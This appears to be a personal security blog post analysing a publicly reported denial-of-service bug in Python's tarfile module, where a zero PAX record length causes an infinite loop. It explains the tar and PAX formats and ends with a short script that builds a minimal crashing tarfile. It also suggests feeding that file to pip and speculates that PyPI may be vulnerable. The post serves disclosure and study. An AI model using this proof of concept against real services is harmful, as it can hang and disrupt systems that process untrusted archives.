Skip to main content
ℬ㏒.㎈ℓℯℛ.ⓧⓨℤ

Python tarfile infinite loop DoS

The python tarfile module can end up in an infinite loop when opening maliciously malformed tar files. I came across Denial of Service bug bpo39017 when browsing the python bug tracker for security issues (I didn't discover this bug myself). The error-reproducing zipfile the reporter uploaded is direct from the fuzzer, but I wanted to understand and isolate the issue by making the smallest tarfile which reproduces the bug.

Tarfile structure #

The name tar is derived from "tape archive" which harks back to its 1979 release to help store multiple files on magnetic tape. Tar files are made up of blocks of 512 bytes. There's no overall header or central directory: to list files you'll need to scan through the tarfile and read all the header records. Any header struct (257 bytes) or content will be padded to the block size, so most of a tarfile will be NULL bytes. The header is a bit gross, having integer fields encoded as ASCII digits in octal.

Serious tarfile vulnerabilities #

The tarfile headers contain the archived filenames. If the filename is an absolute path, some tarfile implementations can be tricked into extracting files to arbitrary locations. Arbitrary write may also be possible when extracting symlinks. The same issues affect other archive formats. This post isn't about these vulnerabilities.

PAX #

The bug is in python's tarfile module's processing of PAX header records. PAX is extensions for tar which add properties left out of the original tar header struct, or which don't fit within the fixed size fields defined in times gone by e.g. symlinks, arbitrary resolution timestamps, uids > 2097151, file sizes > 8GB, long filenames. If we want to specify PAX information for a file, we make a fake file with the typeflag in the header record set to x or g. The fake file's content is the extra PAX headers. The next block can contain the normal header record for the file, followed by blocks containing the file contents.

You can try to make a PAX tarfile: (Without --blocking-factor, each block is some multiple of 512 bytes)

echo "myfilecontent" > myfile
tar -cf hello.tar --format=pax --blocking-factor=1 myfile
hexdump -C hello.tar
00000000  2e 2f 50 61 78 48 65 61  64 65 72 73 2e 31 39 31  |./PaxHeaders.191| # Header for fake file
00000010  37 37 2f 6d 79 66 69 6c  65 00 00 00 00 00 00 00  |77/myfile.......|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  00 00 00 00 30 30 30 30  36 34 34 00 30 30 30 30  |....0000644.0000|
00000070  30 30 30 00 30 30 30 30  30 30 30 00 30 30 30 30  |000.0000000.0000|
00000080  30 30 30 30 30 36 31 00  30 37 30 33 33 32 34 31  |0000061.07033241|
00000090  36 30 30 00 30 31 32 31  36 34 00 20 78 00 00 00  |600.012164. x...|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000100  00 75 73 74 61 72 00 30  30 00 00 00 00 00 00 00  |.ustar.00.......|
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000200  31 39 20 61 74 69 6d 65  3d 39 34 36 36 38 34 38  |19 atime=9466848| # PAX header records
00000210  30 30 0a 33 30 20 63 74  69 6d 65 3d 31 35 39 34  |00.30 ctime=1594|
00000220  33 34 30 33 32 30 2e 38  30 31 30 37 35 30 36 35  |340320.801075065|
00000230  0a 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000240  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000400  6d 79 66 69 6c 65 00 00  00 00 00 00 00 00 00 00  |myfile..........| # File header
00000410  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000460  00 00 00 00 30 30 30 30  36 34 34 00 30 30 30 31  |....0000644.0001|
00000470  37 35 30 00 30 30 30 31  37 35 30 00 30 30 30 30  |750.0001750.0000|
00000480  30 30 30 30 30 31 36 00  30 37 30 33 33 32 34 31  |0000016.07033241|
00000490  36 30 30 00 30 31 31 36  35 30 00 20 30 00 00 00  |600.011650. 0...|
000004a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000500  00 75 73 74 61 72 00 30  30 62 65 6e 00 00 00 00  |.ustar.00ben....|
00000510  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000520  00 00 00 00 00 00 00 00  00 62 65 6e 00 00 00 00  |.........ben....|
00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000540  00 00 00 00 00 00 00 00  00 30 30 30 30 30 30 30  |.........0000000|
00000550  00 30 30 30 30 30 30 30  00 00 00 00 00 00 00 00  |.0000000........|
00000560  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000600  6d 79 66 69 6c 65 63 6f  6e 74 65 6e 74 0a 00 00  |myfilecontent...| # File content
00000610  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000c00  # 2 completely NULL blocks added at end

Notice those * lines which are multiple lines of NULL bytes. 512 = 0x200, so blocks start at 0x0, 0x200, 0x400, 0x600, 0x800, 0xA00.

PAX headers structure #

A PAX header record is a UTF-8 encoded string of the format: "%d %s=%s\n", <length>, <keyword>, <value>

Several of these records can be concatenated.

The length is the length of the record, including the length field and the ending newline. The keyword cannot contain an equals sign. Standard keywords include 'path' & 'atime'.

The bug #

The length and keyword are extracted with a regex. That's not the problem. The problem is that the length is not validated and we use the length variable to iterate:

regex = re.compile(br"(\d+) ([^=]+)=")
pos = 0
while True:
    match = regex.match(buf, pos)
    if not match:
        break

    length, keyword = match.groups()
    ...
    pos += length

If length is zero, e.g. if buf contains "0 X=", we loop forever.

Does this affect other languages? #

In the rust crate tar-rs, the block is first split on newline characters. The length field is then checked against the actual length of the record. I didn't see any tarfile documentation that forbids newline characters within a keyword. This library would reject such a record, but that's almost definitely ok. Golang checks that the length is sensible and then that the record ends in a newline. Ruby and php seem ok.

This is probably a python-only bug.

Exploitation #

First we make a 512-byte header block specifying that the following block is PAX information (type is 'x' or 'g'). Then we append "0 X=" for a total of 516 bytes.

Feed the output file into tarfile.open() or tarfile.is_tarfile() and wait a very long time. Or try pip install recursion.tar. I'd imagine that the pypi server is vulnerable to this, but untrusted tarfiles aren't ingested by too many python services as far as I'm aware.

Script for minimal reproducing tarfile:

def make_file() -> bytearray:
    header = bytearray(512)
    header[0x7c] = 0x31  # size = ASCII '1' (must be > 0)
    header[0x94:0x9d] = b"000630\x00 g"  # chksum + typeflag 'g'
    return header + b"0 X="


with open("recursion.tar", "wb") as f:
    f.write(make_file())

Downloads #